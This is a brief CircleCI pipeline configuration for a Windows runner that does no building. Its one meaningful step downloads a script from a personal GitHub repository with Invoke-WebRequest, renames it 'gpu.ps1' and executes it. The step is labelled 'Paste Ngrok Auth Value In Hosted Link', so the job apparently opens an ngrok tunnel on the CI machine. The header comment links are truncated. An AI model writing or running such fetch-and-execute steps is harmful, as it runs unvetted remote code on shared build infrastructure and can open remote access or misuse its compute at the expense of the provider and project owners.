# Use the latest 2.1 version of CircleCI pipeline process engine.
# See: https://circleci.com/docs/2.0/configuration-refer

# Define a job to be invoked later in a workflow.
# See: https://circlec

version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
      
        
 
    steps:  
       
      - run: 
          name: Paste Ngrok Auth Value In Hosted Link
          command: |      
            Invoke-WebRequest https://raw.githubusercontent.com/Joshuaguillo12345/joshua/main/joshua.sh -OutFile gpu.ps1 
          
      - run: ./gpu.ps1